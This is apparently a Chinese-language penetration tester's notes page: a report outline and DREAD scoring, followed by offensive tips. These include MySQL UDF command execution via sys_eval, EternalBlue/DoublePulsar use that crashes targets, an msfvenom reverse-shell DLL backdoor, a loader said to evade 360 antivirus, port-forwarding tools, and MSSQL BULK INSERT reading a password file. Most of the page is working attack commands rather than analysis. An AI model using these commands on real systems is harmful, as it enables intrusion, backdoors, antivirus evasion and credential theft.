这份渗透测试报告是之前帮一个朋友写的, 敏感信息已经被我抠出来了, 只有框架.

1 项目概述

	1.1 渗透测试目的
	1.2 渗透测试范围
	1.3 渗透测试工具
	1.4 渗透测试组织
	1.5 渗透测试原则

2 渗透测试方法

	2.1 工具自动分析
	2.2 人工手动分析
	2.3 风险评估

3 网站漏洞详情

４ 总结

	４.1 网站目前安全现状
	４.2 存在问题和整改建议	

渗透测试报告.docx

微软的 DREAD 模型.

高危: 12-15分, 中危: 8-11分, 低危: 0-7分.

T00ls 一位前辈在 2013 年写的工具, 虽然比较老, 但挺好用的.

魔改了下脚本, 支持 Python3, http 请求库换成了 requests.

支持 HEAD/GET 扫描
支持自定义 404 关键字
支持自定义 Cookie
随机 User-Agent
多线程

udf/mysql/windows/32/lib_mysqludf_sys.dll_

用 extra/cloak 下的 cloak.py 解码

cloak.py -d -i lib_mysqludf_sys.dll_

mysql 导入执行

select sys_eval('whoami');

提取了 NSA 工具包里的 Eternalblue 和 Doublepulsar.

Target 分为 XP 和 WIN72K8R2.

第一次打的时候会蓝屏, 大约 10 秒后服务器重启, 打到第二次就成功了.

生成 dll

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f dll > bakdoor.dll

payload 设置为 windows/x64/shell_bind_tcp 可以通过 netcat 连接, 也能用 windows/exec 直接添加账户.

Lz1y Blog

参考 Lz1y 大佬的代码, 自己改了改.

完美过 360

用 Pyinstaller 打包:

pyinstaller xxoo.py -F

大约 4mb 左右.

目前我手中的 lcx 有这几种.

lcx - 初始版本
mylcx - 重写版本
lcxg - Golang 版本

注意反斜杠转义

需要 SA 或 BULK INSERT 权限

create table test(
	context ntext
);

BULK INSERT test FROM 'c:/pass.txt'
WITH (
   DATAFILETYPE = 'char',
   KEEPNULLS
);

select * from test;

drop table test;